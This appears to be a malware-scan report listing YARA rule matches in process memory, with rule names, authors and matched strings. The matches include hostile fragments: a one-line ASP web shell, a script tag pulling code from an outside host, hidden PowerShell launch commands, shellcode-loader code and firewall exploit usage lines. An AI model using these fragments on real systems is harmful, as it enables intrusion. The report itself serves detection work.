00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PHP_shell	Webshells Auto-generated - file shell.php	Yara Bulk Rule Generator by Florian Roth	0x190f0c:$s0: AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz 0x190f69:$s11: 1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	rdrbs100	Webshells Auto-generated - file rdrbs100.exe	Yara Bulk Rule Generator by Florian Roth	0x19140b:$s3: Server address must be IP in A.B.C.D format. 0x191447:$s4: mapped ports in the list. Currently
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Mithril_Mithril	Webshells Auto-generated - file Mithril.exe	Yara Bulk Rule Generator by Florian Roth	0x19164c:$s0: OpenProcess error! 0x19166e:$s1: WriteProcessMemory error! 0x191697:$s4: GetProcAddress error! 0x1916bc:$s5: HHt`HHt\ 0x1916d5:$s6: Cmaudi0 0x1916ec:$s7: CreateRemoteThread error! 0x8630:$s8: Kernel32 0x2d8e9:$s8: Kernel32 0x2dadd:$s8: Kernel32 0x4d981:$s8: Kernel32 0xc1aca:$s8: Kernel32 0x191715:$s8: Kernel32 0x19172d:$s9: VirtualAllocEx error!
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	hkdoordll	Webshells Auto-generated - file hkdoordll.dll	Yara Bulk Rule Generator by Florian Roth	0x1923cd:$s6: Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Mithril_v1_45_dllTest	Webshells Auto-generated - file dllTest.dll	Yara Bulk Rule Generator by Florian Roth	0x192834:$s3: syspath 0x18c9f5:$s4: \Mithril 0x19284c:$s4: \Mithril 0x193109:$s4: \Mithril 0x192864:$s5: --list the services in the computer 0x195436:$s5: --list the services in the computer
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	dbgiis6cli	Webshells Auto-generated - file dbgiis6cli.exe	Yara Bulk Rule Generator by Florian Roth	0x192a68:$s0: User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) 0x192ab7:$s5: ###command:(NO more than 100 bytes!)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Debug_cress	Webshells Auto-generated - file cress.exe	Yara Bulk Rule Generator by Florian Roth	0x193109:$s0: \Mithril 0x18c896:$s4: Mithril.exe 0x19150e:$s4: Mithril.exe 0x193122:$s4: Mithril.exe
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FeliksPack3___PHP_Shells_usr	Webshells Auto-generated - file usr.php	Yara Bulk Rule Generator by Florian Roth	0x193e61:$s0: <?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FSO_s_phpinj	Webshells Auto-generated - file phpinj.php	Yara Bulk Rule Generator by Florian Roth	0x194089:$s4: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />'; 0x19bdfe:$s4: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	xssshell_db	Webshells Auto-generated - file db.asp	Yara Bulk Rule Generator by Florian Roth	0x19429a:$s8: '// By Ferruh Mavituna \| http://ferruh.mavituna.com
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EditServer_Webshell_2	Webshells Auto-generated - file EditServer.exe	Yara Bulk Rule Generator by Florian Roth	0x1948cf:$s0: @HOTMAIL.COM 0x1948eb:$s1: Press Any Ke 0x194907:$s3: glish MenuZ
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	by064cli	Webshells Auto-generated - file by064cli.exe	Yara Bulk Rule Generator by Florian Roth	0x194aef:$s7: packet dropped,redirecting 0x194b19:$s9: input the password(the default one is 'by')
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Mithril_dllTest	Webshells Auto-generated - file dllTest.dll	Yara Bulk Rule Generator by Florian Roth	0x194d27:$s0: please enter the password: 0x194d52:$s3: \dllTest.pdb 0x19541a:$s3: \dllTest.pdb
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	connector	Webshells Auto-generated - file connector.asp	Yara Bulk Rule Generator by Florian Roth	0x195635:$s2: If ( AttackID = BROADCAST_ATTACK ) 0x195667:$s4: Add UNIQUE ID for victims / zombies
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	shelltools_g0t_root_HideRun	Webshells Auto-generated - file HideRun.exe	Yara Bulk Rule Generator by Florian Roth	0x195879:$s0: Usage -- hiderun [AppName] 0x1958a3:$s7: PVAX SW, Alexey A. Popoff, Moscow, 1997.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PHP_Shell_v1_7	Webshells Auto-generated - file PHP_Shell_v1.7.php	Yara Bulk Rule Generator by Florian Roth	0x195aad:$s8: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME] 0x1abfe1:$s8: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	xssshell_save	Webshells Auto-generated - file save.asp	Yara Bulk Rule Generator by Florian Roth	0x195cb4:$s4: RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID 0x195d13:$s5: VictimID = fm_NStr(Victims(i))
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ZXshell2_0_rar_Folder_zxrecv	Webshells Auto-generated - file zxrecv.exe	Yara Bulk Rule Generator by Florian Roth	0x19635b:$s0: RyFlushBuff 0x196376:$s1: teToWideChar^FiYP 0x196397:$s2: mdesc+8F D 0x1963b2:$s3: \von76std 0x1963cb:$s4: 5pur+virtul 0x1963e6:$s5: - Kablto io 0x196401:$s6: ac#f{lowi8a
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	_root_040_zip_Folder_deploy	Webshells Auto-generated - file deploy.exe	Yara Bulk Rule Generator by Florian Roth	0x19731a:$s5: halon synscan 127.0.0.1 1-65536 0x197349:$s8: Obviously you replace the ip address with that of the target.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	by063cli	Webshells Auto-generated - file by063cli.exe	Yara Bulk Rule Generator by Florian Roth	0x197563:$s2: #popmsghello,are you all right? 0x197592:$s4: connect failed,check your network and remote ip.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	icyfox007v1_10_rar_Folder_asp	Webshells Auto-generated - file asp.asp	Yara Bulk Rule Generator by Florian Roth	0x179e9f:$s0: <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	byshell063_ntboot_2	Webshells Auto-generated - file ntboot.dll	Yara Bulk Rule Generator by Florian Roth	0x1977a8:$s6: OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	vanquish_2	Webshells Auto-generated - file vanquish.exe	Yara Bulk Rule Generator by Florian Roth	0x197e67:$s2: Vanquish - DLL injection failed:
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	BIN_Server	Webshells Auto-generated - file Server.exe	Yara Bulk Rule Generator by Florian Roth	0x198b48:$s0: configserver 0x198b64:$s1: GetLogicalDrives 0x198b84:$s2: WinExec 0x198b9b:$s4: fxftest 0x198bb2:$s5: upfileok 0x198bca:$s7: upfileer
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	HYTop2006_rar_Folder_2006	Webshells Auto-generated - file 2006.asp	Yara Bulk Rule Generator by Florian Roth	0x198db5:$s6: strBackDoor = strBackDoor
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	HDConfig	Webshells Auto-generated - file HDConfig.exe	Yara Bulk Rule Generator by Florian Roth	0x199197:$s0: An encryption key is derived from the password hash. 0x1991dc:$s3: A hash object has been created. 0x19920c:$s4: Error during CryptCreateHash! 0x199239:$s5: A new key container has been created. 0x19926e:$s6: The password has been added to the hash.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Webshell_and_Exploit_CN_APT_HK	Webshell and Exploit Code in relation with APT against Honk Kong protesters	Florian Roth	0x18b99d:$a0: <script language=javascript src=http://java-se.com/o.js</script>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Pastebin_Webshell	Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs	Florian Roth	0x182b73:$s1: xcurl('http://pastebin.com/download.php 0x182baf:$s2: xcurl('http://pastebin.com/raw.php 0x182be6:$x0: if($content){unlink('evex.php'); 0x182c50:$y0: file_put_contents($pth 0x182ca1:$y2: str_replace('* @package Wordpress',$temp
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	netwire	detect netwire in memory	JPCERT/CC Incident Response Group	0x5f93:$v2: mozsqlite3 0x4022d:$ping: ping 192.0.2.2 0x4026e:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
Process Memory Space: vnwareupdate.exe PID: 2540	Msfpayloads_msf	Metasploit Payloads - file msf.sh	Florian Roth	0xdc3886:$s1: export buf=\
Process Memory Space: vnwareupdate.exe PID: 2540	Msfpayloads_msf_psh	Metasploit Payloads - file msf-psh.vba	Florian Roth	0xd67969:$s1: powershell.exe -nop -w hidden -e 0xdc3d49:$s1: powershell.exe -nop -w hidden -e 0xdc44f5:$s1: powershell.exe -nop -w hidden -e 0xdc3d7e:$s2: Call Shell( 0xdc3da7:$s3: Sub Workbook_Open()
Process Memory Space: vnwareupdate.exe PID: 2540	Msfpayloads_msf_exe	Metasploit Payloads - file msf-exe.vba	Florian Roth	0xdc4957:$s1: '* PAYLOAD DATA 0xdc4984:$s2: = Shell( 0xdc49da:$s4: '************************************************************** 0xdc4a37:$s5: ChDir ( 0xdc4a5c:$s6: '* MACRO CODE
Process Memory Space: vnwareupdate.exe PID: 2540	Msfpayloads_msf_3	Metasploit Payloads - file msf.psh	Florian Roth	0xdc4cb1:$s2: public enum MemoryProtection { ExecuteReadWrite = 0x40 } 0xdc4d07:$s3: .func]::VirtualAlloc(0, 0xdc4d2e:$s4: .func+AllocationType]::Reserve -bOr [ 0xdc4d68:$s5: New-Object System.CodeDom.Compiler.CompilerParameters 0xdc4e27:$s7: public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 } 0xdc4e85:$s8: .func]::CreateThread(0,0,$ 0xdc4ebd:$s9: public enum Time : uint { Infinite = 0xFFFFFFFF } 0xdc4f4b:$s11: { $global:result = 3; return }
Process Memory Space: vnwareupdate.exe PID: 2540	Msfpayloads_msf_4	Metasploit Payloads - file msf.aspx	Florian Roth	0xdc5152:$s1: = VirtualAlloc(IntPtr.Zero,(UIntPtr) 0xdc518b:$s2: .Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); 0xdc5222:$s4: private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; 0xdc527a:$s5: private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
Process Memory Space: vnwareupdate.exe PID: 2540	Msfpayloads_msf_cmd	Metasploit Payloads - file msf-cmd.ps1	Florian Roth	0xdc44d7:$x1: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e
Process Memory Space: vnwareupdate.exe PID: 2540	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0xdc6731:$s1: kernel32.dll WaitForSingleObject), 0xdc67f1:$s3: GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object 0xdc6867:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0xd6212a:$s5: = [System.Convert]::FromBase64String( 0xdc4f0d:$s5: = [System.Convert]::FromBase64String( 0xdc68ba:$s5: = [System.Convert]::FromBase64String( 0xdc68f4:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0xdc6947:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
Process Memory Space: vnwareupdate.exe PID: 2540	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x1ff82d:$s1: WS2_32.dll 0xd726e4:$s1: WS2_32.dll 0xddd67a:$s1: WS2_32.dll 0xe7c892:$s1: WS2_32.dll 0xd70063:$s2: ReflectiveLoader 0xd70120:$s2: ReflectiveLoader 0xd707d5:$s2: ReflectiveLoader 0xd708be:$s2: ReflectiveLoader 0xd7726f:$s2: ReflectiveLoader 0xd77366:$s2: ReflectiveLoader 0xd782db:$s2: ReflectiveLoader 0xd78ba1:$s2: ReflectiveLoader 0xd7902d:$s2: ReflectiveLoader
Process Memory Space: vnwareupdate.exe PID: 2540	PowerShell_ISESteroids_Obfuscation	Detects PowerShell ISESteroids obfuscation	Florian Roth	0xd8455a:$x3: Catch { } 0xd84582:$x4: \_/=} ${_
Process Memory Space: vnwareupdate.exe PID: 2540	Payload_Exe2Hex	Detects payload generated by exe2hex	Florian Roth	0xe0e32c:$b1: set+%2Fp+%22%3D4d5 0xe0e353:$b2: powershell+-Command+%22%24hex 0xe0e385:$c1: echo 4d 5a 0xe0e3a5:$c2: echo r cx >> 0xe0e3c6:$d1: echo+4d+5a+ 0xe0e3e6:$d2: echo+r+cx+%3E%3E
Process Memory Space: vnwareupdate.exe PID: 2540	Codoso_CustomTCP_4	Detects Codoso APT CustomTCP Malware	Florian Roth	0xe0b4bf:$x1: varus_service_x86.dll 0xe0bcc6:$x1: varus_service_x86.dll 0xe0b4f2:$s1: /s %s /p %d /st %d /rt %d 0xe0bcf9:$s1: /s %s /p %d /st %d /rt %d 0xe0b529:$s2: net start %%1 0xe0bd30:$s2: net start %%1 0xe0b554:$s3: ping 127.1 > nul 0xe0bd5b:$s3: ping 127.1 > nul 0xe0b582:$s4: McInitMISPAlertEx 0xe0bd89:$s4: McInitMISPAlertEx 0xe0b5b1:$s5: sc start %%1 0xe0bdb8:$s5: sc start %%1 0xe0b5db:$s6: net stop %%1 0xe0be0a:$s6: net stop %%1 0xe0b605:$s7: WorkerRun 0xe0c705:$s7: WorkerRun
Process Memory Space: vnwareupdate.exe PID: 2540	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xe0c322:$x1: cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s 0xe0cc78:$x1: cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s 0xe0cdbd:$s1: spideragent.exe 0xe0cdea:$s2: AVGIDSAgent.exe 0xe0ce17:$s3: kavsvc.exe 0xe0ce3f:$s4: mspaint.exe 0xe0ce68:$s5: kav.exe 0xe0ce8d:$s6: avp.exe 0xe0ceb2:$s7: NAV.exe 0xe0d004:$c6: ConsentPromptBehaviorAdmin
Process Memory Space: vnwareupdate.exe PID: 2540	Codoso_PGV_PVID_1	Detects Codoso APT PGV PVID Malware	Florian Roth	0xe0dedb:$s1: TsWorkSpaces.dll 0xe0df4a:$s3: /selfservice/microsites/search.php?%016I64d 0xe0df93:$s4: /solutions/company-size/smb/index.htm?%016I64d 0xe0e047:$s7: {%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X} 0xe0e097:$s8: WUServiceMain 0xe0de85:$s9: Cookie: pgv_pvid=
Process Memory Space: vnwareupdate.exe PID: 2540	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0xe02e66:$x3: \xclolg2.tmp 0xe02e90:$x4: Http/1.1 403 Forbidden 0xe030c5:$x4: Http/1.1 403 Forbidden 0xe02ec4:$x5: %sxsd%d.pif 0xe02f17:$x7: %-23s %-16s 0x%x(%02d) 0xe02f4c:$x8: RegSetValueEx(start) 0xe03001:$s1: viewsc.dll 0xe03029:$s2: Proxy-Connection: Keep-Alive 0xe03066:$s3: \sfc_os.dll 0xdbae53:$s4: Mozilla/4.0 (compatible) 0xe0308f:$s4: Mozilla/4.0 (compatible) 0xe02e90:$s5: Http/1.1 403 Forbidden 0xe030c5:$s5: Http/1.1 403 Forbidden 0xe030f9:$s6: CONNECT %s:%d HTTP/1.1 0xe03131:$s7: WindowsUpperVersion 0xe03162:$s8: [%d-%d-%d %d:%d:%d] (%s) 0xe031da:$s10: %s sp%d(%d) 0xe03204:$s11: OpenSC ERROR 0xe03230:$s12: get rgspath error
Process Memory Space: vnwareupdate.exe PID: 2540	GhostDragon_Gh0stRAT_Sample2	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0xe03537:$x1: AdobeWpk 0xe0355d:$x2: seekin.dll 0xd27250:$c1: Windows NT 6.1; Trident/6.0) 0xe03585:$c1: Windows NT 6.1; Trident/6.0) 0xe035bf:$c2: Mozilla/5.0 (compatible; MSIE 10.0;
Process Memory Space: vnwareupdate.exe PID: 2540	Reflective_DLL_Loader_Aug17_1	Detects Reflective DLL Loader	Florian Roth	0xd70003:$x2: reflective_dll.x64.dll 0xd70037:$s3: DLL Injection 0xd70062:$s4: ?ReflectiveLoader@@YA_KPEAX@Z 0xd7011f:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
Process Memory Space: vnwareupdate.exe PID: 2540	Reflective_DLL_Loader_Aug17_2	Detects Reflective DLL Loader - suspicious - Possible FP could be program crack	Florian Roth	0xd70744:$x1: \ReflectiveDLLInjection-master\ 0xd70779:$s2: reflective_dll.dll 0xd70b66:$s2: reflective_dll.dll 0xd70bdc:$s2: reflective_dll.dll 0xd707a9:$s3: DLL injection 0xd707d4:$s4: _ReflectiveLoader@4 0xd708bd:$s4: _ReflectiveLoader@4 0xd7902c:$s4: _ReflectiveLoader@4 0xd70805:$s5: Reflective Dll Injection
Process Memory Space: vnwareupdate.exe PID: 2540	Reflective_DLL_Loader_Aug17_3	Detects Reflective DLL Loader	Florian Roth	0xd70b12:$s2: !!! Failed to gather information on system processes! 0xd70779:$s3: reflective_dll.dll 0xd70b66:$s3: reflective_dll.dll 0xd70bdc:$s3: reflective_dll.dll 0xd70b96:$s4: [-] %s. Error=%d
Process Memory Space: vnwareupdate.exe PID: 2540	QuarksPwDump_Gen	Detects all QuarksPWDump versions	Florian Roth	0xe17d55:$s1: OpenProcessToken() error: 0x%08X 0xe17d93:$s2: %d dumped 0xe17dba:$s3: AdjustTokenPrivileges() error: 0x%08X 0xe17dfe:$s4: \SAM-%u.dmp
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_create_dns_injection	EQGRP Toolset Firewall - file create_dns_injection.py	Florian Roth	0xdeb64e:$s1: Name: A hostname: 'host.network.com', a decimal numeric offset within 0xdeb6b3:$s2: -a www.badguy.net,CNAME,1800,host.badguy.net \\
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_screamingplow	EQGRP Toolset Firewall - file screamingplow.sh	Florian Roth	0xdeb8ba:$s1: What is the name of your PBD: 0xdeb8f5:$s2: You are now ready for a ScreamPlow
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_MixText	EQGRP Toolset Firewall - file MixText.py	Florian Roth	0xdebae1:$s1: BinStore enabled implants.
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_tunnel_state_reader	EQGRP Toolset Firewall - file tunnel_state_reader	Florian Roth	0xdebcda:$s1: Active connections will be maintained for this tunnel. Timeout: 0xdebd37:$s5: %s: compatible with BLATSTING version 1.2
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_payload	EQGRP Toolset Firewall - file payload.py	Florian Roth	0xdebf2a:$s1: can't find target version module! 0xdebf69:$s2: class Payload:
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_eligiblecandidate	EQGRP Toolset Firewall - file eligiblecandidate.py	Florian Roth	0xded8cd:$o1: Connection timed out. Only a problem if the callback was not received. 0xded931:$o2: Could not reliably detect cookie. Using 'session_id'... 0xded9d7:$c2: self.build_exploit_payload(cmd)
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_BUSURPER_2211_724	EQGRP Toolset Firewall - file BUSURPER-2211-724.exe	Florian Roth	0xdec158:$s1: .got_loader 0xdee4ad:$s1: .got_loader 0xdeea27:$s1: .got_loader 0xdefd0d:$s1: .got_loader 0xdf0385:$s1: .got_loader 0xdf06ab:$s1: .got_loader 0xdf14df:$s1: .got_loader 0xdf21fb:$s1: .got_loader 0xdec181:$s2: _start_text 0xdeea9d:$s2: _start_text 0xdec1aa:$s3: IMPLANT 0xdecae7:$s3: IMPLANT 0xdec1cf:$s4: KEEPGOING 0xdecb0c:$s4: KEEPGOING 0xdeeaf4:$s4: KEEPGOING 0xdf06fc:$s4: KEEPGOING 0xdf155a:$s4: KEEPGOING 0xdf227c:$s4: KEEPGOING 0xdec1f6:$s5: upgrade_implant 0xdecb33:$s5: upgrade_implant
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_networkProfiler_orderScans	EQGRP Toolset Firewall - file networkProfiler_orderScans.sh	Florian Roth	0xdec3f7:$x1: Unable to save off predefinedScans directory 0xdec441:$x2: Re-orders the networkProfiler scans so they show up in order in the LP
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_epicbanana_2_1_0_1	EQGRP Toolset Firewall - file epicbanana_2.1.0.1.py	Florian Roth	0xdec667:$s1: failed to create version-specific payload
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_sniffer_xml2pcap	EQGRP Toolset Firewall - file sniffer_xml2pcap	Florian Roth	0xdedbdc:$x1: -s/--srcip <sourceIP> Use given source IP (if sniffer doesn't collect source IP) 0xdedc4b:$x2: convert an XML file generated by the BLATSTING sniffer module into a pcap capture file.
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_BananaAid	EQGRP Toolset Firewall - file BananaAid	Florian Roth	0xdede7a:$x1: (might have to delete key in ~/.ssh/known_hosts on linux box) 0xdeded5:$x2: scp BGLEE- 0xdedef4:$x3: should be 4bfe94b1 for clean bootloader version 3.0; 0xdedf47:$x4: scp <configured implant> <username>@<IPaddr>:onfig
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_config_jp1_UA	EQGRP Toolset Firewall - file config_jp1_UA.pl	Florian Roth	0xdee709:$x1: This program will configure a JETPLOW Userarea file. 0xdee75b:$x2: Error running config_implant. 0xdee796:$x3: NOTE: IT ASSUMES YOU ARE OPERATING IN THE INSTALL/LP/JP DIRECTORY. THIS ASSUMPTION 0xdee808:$x4: First IP address for beacon destination [127.0.0.1]
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_userscript	EQGRP Toolset Firewall - file userscript.FW	Florian Roth	0xdec8b4:$x1: Are you sure? Don't forget that NETSCREEN firewalls require BANANALIAR!!
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_BUSURPER_3001_724	EQGRP Toolset Firewall - file BUSURPER-3001-724.exe	Florian Roth	0xdec1aa:$s1: IMPLANT 0xdecae7:$s1: IMPLANT 0xdec1cf:$s2: KEEPGOING 0xdecb0c:$s2: KEEPGOING 0xdeeaf4:$s2: KEEPGOING 0xdf06fc:$s2: KEEPGOING 0xdf155a:$s2: KEEPGOING 0xdf227c:$s2: KEEPGOING 0xdec1f6:$s3: upgrade_implant 0xdecb33:$s3: upgrade_implant
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_workit	EQGRP Toolset Firewall - file workit.py	Florian Roth	0xdeed08:$s1: macdef init > /tmp/.netrc; 0xdeed40:$s2: /usr/bin/wget http:// 0xdeed73:$s3: HOME=/tmp ftp 0xdeed9e:$s4: >> /tmp/.netrc; 0xdeedcc:$s5: /usr/rapidstream/bin/tftp 0xdeee03:$s6: created shell_command: 0xdeee37:$s7: rm -f /tmp/.netrc; 0xdeee67:$s8: echo quit >> /tmp/.netrc; 0xdeee9e:$s9: echo binary >> /tmp/.netrc; 0xdeeed8:$s10: chmod 600 /tmp/.netrc; 0xdeef0d:$s11: created cli_command:
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_tinyhttp_setup	EQGRP Toolset Firewall - file tinyhttp_setup.sh	Florian Roth	0xdef104:$x1: firefox http://127.0.0.1:8000/$_name 0xdef146:$x2: What is the name of your implant: 0xdef185:$x3: killall thttpd 0xdef1b1:$x4: copy http://<IP>:80/$_name flash:/$_name
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_EPBA	EQGRP Toolset Firewall - file EPBA.script	Florian Roth	0xdef808:$x1: ./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=NA -p 22 0xdef89d:$x2: -t TARGET_IP, --target_ip=TARGET_IP -- Either 127.0.0.1 or Win Ops IP 0xdef900:$x3: ./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport RHP --dport RHP 0xdef965:$x4: --target_vers=TARGET_VERS target Pix version (pix712, asa804) (REQUIRED) 0xdef9ce:$x5: -p DEST_PORT, --dest_port=DEST_PORT defaults: telnet=23, ssh=22 (optional) - Change to LOCAL redirect port 0xdefa56:$x6: this operation is complete, BananaGlee will 0xdefa9f:$x7: cd /current/bin/FW/BGXXXX/Install/LP
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_jetplow_SH	EQGRP Toolset Firewall - file jetplow.sh	Florian Roth	0xdf0020:$s1: cd /current/bin/FW/BANANAGLEE/$bgver/Install/LP/jetplow 0xdf0075:$s2: *** Please place your UA in /current/bin/FW/OPS * 0xdf00ca:$s3: ln -s ../jp/orig_code.bin orig_code_pixGen.bin 0xdf0116:$s4: * Welcome to JetPlow ***
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_extrabacon	EQGRP Toolset Firewall - file extrabacon_1.1.0.1.py	Florian Roth	0xdf0912:$x1: To disable password checking on target: 0xdf0957:$x2: [-] target is running 0xdf098a:$x3: [-] problem importing version-specific shellcode from 0xdf09dd:$x4: [+] importing version-specific shellcode 0xdf0a23:$s5: [-] unsupported target version, abort
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_sploit_py	EQGRP Toolset Firewall - file sploit.py	Florian Roth	0xdecd54:$x1: the --spoof option requires 3 or 4 fields as follows redir_ip 0xdecda6:$x2: [-] timeout waiting for response - target may have crashed 0xdecdfe:$x3: [-] no response from health check - target may have crashed
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_uninstallPBD	EQGRP Toolset Firewall - file uninstallPBD.bat	Florian Roth	0xded00e:$s1: memset 00e9a05c 4 38845b88 0xded046:$s2: _hidecmd 0xded06c:$s3: memset 013abd04 1 0d
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_BICECREAM	EQGRP Toolset Firewall - file BICECREAM-2140	Florian Roth	0xdf0c23:$s1: Could not connect to target device: %s:%d. Please check IP address. 0xdf0c84:$s2: command data size is invalid for an exec cmd 0xdf0cce:$s3: A script was specified but target is not a PPC405-based NetScreen (NS5XT, NS25, and NS50). Executing scripts is supported but ma 0xdf0d63:$s4: Execute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n] 0xdf0db9:$s5: Execute 0x%08x with args (%08x, %08x, %08x): [y/n] 0xdf0e09:$s6: [%d] Execute code. 0xdf0e39:$s7: Execute 0x%08x with args (%08x): [y/n] 0xdf0e7d:$s8: dump_value_LHASH_DOALL_ARG 0xdf0eb5:$s9: Eggcode is complete. Pass execution to it? [y/n]
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_BFLEA_2201	EQGRP Toolset Firewall - file BFLEA-2201.exe	Florian Roth	0xdec158:$s1: .got_loader 0xdee4ad:$s1: .got_loader 0xdeea27:$s1: .got_loader 0xdefd0d:$s1: .got_loader 0xdf0385:$s1: .got_loader 0xdf06ab:$s1: .got_loader 0xdf14df:$s1: .got_loader 0xdf21fb:$s1: .got_loader 0x36ae66:$s2: LOADED 0xdeea50:$s2: LOADED 0xdefd98:$s2: LOADED 0xdf03dc:$s2: LOADED 0xdf1508:$s2: LOADED 0xdf152c:$s3: readFlashHandler 0xdec1cf:$s4: KEEPGOING 0xdecb0c:$s4: KEEPGOING 0xdeeaf4:$s4: KEEPGOING 0xdf06fc:$s4: KEEPGOING 0xdf155a:$s4: KEEPGOING 0xdf227c:$s4: KEEPGOING 0xdf1581:$s5: flashRtnsPix6x.c
Process Memory Space: vnwareupdate.exe PID: 2540	EQGRP_StoreFc	EQGRP Toolset Firewall - file StoreFc.py	Florian Roth	0xdf1b84:$x1: Usage: StoreFc.py --configFile=<path to xml file> --implantFile=<path to BinStore implant> [--outputFile=<file to write the conf 0xdf1c7c:$x3: This is wrapper for Store.py that FELONYCROWBAR will use. This
